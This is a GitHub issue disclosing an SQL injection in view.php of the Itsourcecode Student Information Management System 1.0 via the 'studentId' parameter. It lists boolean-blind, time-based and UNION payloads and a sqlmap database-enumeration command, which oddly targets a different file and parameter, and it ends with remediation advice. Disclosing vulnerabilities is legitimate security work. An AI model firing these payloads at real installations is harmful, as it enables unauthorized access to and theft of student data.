Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Itsourcecode Student Information Management System in PHP 1.0 view.php SQL injection #2

Open
Lanxiy7th opened this issue May 25, 2024 · 0 comments

Comments

@Lanxiy7th
Copy link
Owner

Itsourcecode Student Information Management System in PHP 1.0 view.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • Student Information Management System in PHP

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • Lanxiy7th

Vulnerable File

  • view.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the 'view.php' file of the 'Student Information Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "studentId" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
  • 3

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of the PHP Student Information Management System, Lanxiy7th discovered a critical SQL injection vulnerability in the "view. php" file. This vulnerability stems from insufficient user input validation of the "studentId" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

Vulnerability details and POC

Vulnerability type:

  • boolean-based blind
  • time-based blind
  • UNION query

Vulnerability location:

  • 'studentId' parameter

Payload:

     view=view&studentId=20004277 AND 5254=5254

     view=view&studentId=20004277 AND (SELECT 4018 FROM (SELECT(SLEEP(5)))eHNw)

     view=view&studentId=20004277 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x504c53717a6d734774675378794d566b745a5862626e4f75627344584353546d707971565056654a,0x716b6b7871),NULL,NULL,NULL,NULL,NULL-- -
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: view=view&studentId=20004277 AND 5254=5254

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: view=view&studentId=20004277 AND (SELECT 4018 FROM (SELECT(SLEEP(5)))eHNw)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: view=view&studentId=20004277 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x504c53717a6d734774675378794d566b745a5862626e4f75627344584353546d707971565056654a,0x716b6b7871),NULL,NULL,NULL,NULL,NULL-- -

  • 1

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

    sqlmap -u "http://192.168.144.199:1215/columbans/admin/modules/class/index.php?view=class&classId=7" --batch --level 5 --dbs          
  • 2

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant